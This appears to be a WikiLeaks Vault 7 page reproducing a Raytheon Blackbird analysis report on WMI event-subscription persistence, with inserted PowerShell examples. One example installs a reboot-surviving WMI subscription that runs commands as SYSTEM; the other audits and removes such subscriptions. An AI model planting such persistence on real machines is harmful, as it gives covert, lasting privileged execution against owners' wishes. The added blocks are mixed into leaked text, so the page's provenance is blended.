Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.

UNCLASSIFIED
Analysis Report
WMI Persistence Proof of Concept – Supplemental Report
(U) Because the description of the method varies from one webpage to the next, we performed significant testing before concluding that IMofCompiler::CompileBuffer's support for ASCII MOF text is either incorrectly described or bugged to the point that it does not work. For example, the exact same file that compiles successfully with mofcomp.exe and IMofCompiler::CompileFile inexplicably fails with IMofCompiler::CompileBuffer. Various approaches were attempted in an effort to get IMofCompiler::CompileBuffer working; none succeeded. Adding to the confusion, the error messages returned in this process did not include line numbers and were generally uninformative.
(U) The problems described above led to the PoC being implemented in a way that accepts an ASCII MOF (or BMOF) file on disk and installs it into the WMI repository. With this in mind, we believe that embedding a BMOF file as a resource and unpacking it into a buffer to feed IMofCompiler::CompileBuffer constitutes the best functionality for future implementations (no MOF file then needs to be written to disk). Furthermore, future implementations should also retain the option of specifying a file to compile and / or install.
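The file-based installation path the report settled on, shown as an added example rather than the Blackbird PoC itself: a MOF file describing a permanent event subscription (filter, CommandLineEventConsumer, binding) is written to disk and compiled with mofcomp.exe, then the resulting objects are verified in root\subscription. The object names, the trigger query (notepad.exe starting), the output path and the use of whoami instead of calc.exe are assumptions made for this example; run it from an elevated prompt on a test VM, because the objects survive reboots until removed.

```powershell
# Added example, not the Blackbird PoC: install a permanent WMI event subscription
# from an ASCII MOF file with mofcomp.exe, the file-based path the report found
# to work. Object names, the trigger query and the output path are assumptions.
# Run from an elevated prompt on a test VM; the objects survive reboots.

$mofPath = Join-Path $env:TEMP 'wmi_persist_example.mof'

# Single-quoted here-string: PowerShell leaves the MOF backslash escapes alone.
# The consumer records whoami output instead of launching calc.exe, because a
# GUI started by the consumer appears on the SYSTEM desktop, not the user's.
$mof = @'
#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $Filter
{
    Name = "ExampleFilter";
    EventNamespace = "root\\cimv2";
    QueryLanguage = "WQL";
    // Trigger chosen so it can be fired on demand: start notepad.exe.
    Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'notepad.exe'";
};

instance of CommandLineEventConsumer as $Consumer
{
    Name = "ExampleConsumer";
    CommandLineTemplate = "cmd.exe /c whoami /all > C:\\Windows\\Temp\\wmi_whoami.txt";
    RunInteractively = false;
};

instance of __FilterToConsumerBinding
{
    Filter = $Filter;
    Consumer = $Consumer;
};
'@

Set-Content -Path $mofPath -Value $mof -Encoding Ascii

# mofcomp.exe parses the MOF and writes the instances into the repository.
& "$env:SystemRoot\System32\wbem\mofcomp.exe" $mofPath
if ($LASTEXITCODE -ne 0) { throw "mofcomp.exe failed with exit code $LASTEXITCODE" }
Remove-Item $mofPath   # the repository now holds the objects; the file is no longer needed

# Verify that all three objects exist in root\subscription.
$ns = 'root\subscription'
Get-WmiObject -Namespace $ns -Class __EventFilter            -Filter "Name='ExampleFilter'"
Get-WmiObject -Namespace $ns -Class CommandLineEventConsumer -Filter "Name='ExampleConsumer'"
Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
    Where-Object { $_.Filter -eq '__EventFilter.Name="ExampleFilter"' }

# Fire it: start notepad, wait for the WITHIN polling interval, then read the
# consumer's output. The user name line shows the consumer ran as SYSTEM.
Start-Process notepad.exe
Start-Sleep -Seconds 10
Get-Content C:\Windows\Temp\wmi_whoami.txt | Select-String -Pattern 'nt authority\\system'
```

The three objects are ordinary repository instances: removing the binding first (Remove-WmiObject on it) stops the consumer firing, after which the filter and consumer can be deleted. mofcomp.exe must see the `#pragma namespace` line, otherwise the instances land in root\default and the subscription never activates.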
(U) During testing, Blackbird found that all tasks performed by the event consumer ran as the SYSTEM user and were executed on the SYSTEM desktop rather than the logged-on user's. For instance, when calc.exe was the command run by the event consumer, calc.exe was not drawn on the user's desktop and could only be seen after switching the desktop context to the SYSTEM desktop. A payload that needs to interact with the user's session must therefore arrange that itself; a command that only writes to a file or the network is unaffected.
(U) Also during testing, Blackbird found that the IMofCompiler interface methods appear to require Administrator rights in order to run successfully. We tested different security levels during COM initialization but were ultimately unable to bypass this requirement. Despite that, Blackbird believes that a security context may yet exist that bypasses the need for elevated credentials. Note that, independently of the compiler interface, writing instances into root\subscription is governed by that namespace's security descriptor, which by default grants write access only to administrators, so any such context would have to satisfy that check as well.
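Because the subscription objects live in the repository as ordinary instances, the same namespace that a PoC like this one writes to can be audited from an elevated prompt. The following is an added example (not Blackbird's code) that checks for the Administrator rights the report found necessary, lists every binding in root\subscription together with the filter query and consumer payload it references, and removes a subscription by filter name; the filter name 'ExampleFilter' and the two consumer classes inspected for a payload are assumptions.

```powershell
# Added example, not the Blackbird PoC: audit permanent WMI event subscriptions
# and remove one by filter name. Run elevated, in line with the report's finding
# that the compiler interfaces need Administrator rights; names are assumptions.

$ns = 'root\subscription'

function Test-IsElevated {
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Get-WmiPersistence {
    # Each binding references its filter and consumer by relative object path,
    # e.g. __EventFilter.Name="X"; the __RELPATH system property of the
    # referenced objects has the same form, so the lookup is a string compare.
    # Querying the abstract base __EventConsumer returns every consumer type.
    $filters   = @(Get-WmiObject -Namespace $ns -Class __EventFilter)
    $consumers = @(Get-WmiObject -Namespace $ns -Class __EventConsumer)
    foreach ($b in @(Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding)) {
        $f = $filters   | Where-Object { $_.__RELPATH -eq $b.Filter }
        $c = $consumers | Where-Object { $_.__RELPATH -eq $b.Consumer }

        # The executable payload lives in a class-specific property.
        $payload = $null
        if ($c.__CLASS -eq 'CommandLineEventConsumer')  { $payload = $c.CommandLineTemplate }
        if ($c.__CLASS -eq 'ActiveScriptEventConsumer') { $payload = $c.ScriptText }

        [pscustomobject]@{
            FilterName   = $f.Name
            Query        = $f.Query
            ConsumerType = $c.__CLASS
            ConsumerName = $c.Name
            Payload      = $payload
        }
    }
}

function Remove-WmiPersistence {
    param([Parameter(Mandatory = $true)][string]$FilterName)
    $target   = '__EventFilter.Name="{0}"' -f $FilterName
    $bindings = @(Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
                  Where-Object { $_.Filter -eq $target })
    foreach ($b in $bindings) {
        $consumerPath = $b.Consumer
        # Delete the binding first so the consumer cannot fire while we clean up.
        $b | Remove-WmiObject
        Get-WmiObject -Namespace $ns -Class __EventConsumer |
            Where-Object { $_.__RELPATH -eq $consumerPath } | Remove-WmiObject
    }
    Get-WmiObject -Namespace $ns -Class __EventFilter -Filter "Name='$FilterName'" |
        Remove-WmiObject
}

if (-not (Test-IsElevated)) {
    throw 'Run from an elevated prompt: root\subscription is writable only to administrators by default.'
}
Get-WmiPersistence | Format-List
# Remove-WmiPersistence -FilterName 'ExampleFilter'
```

Bindings whose filter or consumer no longer exists show empty fields, which is itself worth noting during an audit; the removal function deletes the binding before the consumer so that nothing can fire with a half-deleted subscription.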
(U) Blackbird would also like to highlight the Microsoft WMI Tools package (WMI CIM Studio, WMI Event Registration, WMI Event Viewer and WMI Object Browser), which we believe is essential to future development and testing of any program with an implementation similar to this one.
Raytheon Blackbird Technologies, Inc.
26 June 2015
Use or disclosure of data contained on this sheet is subject to the restrictions on the title page of this document.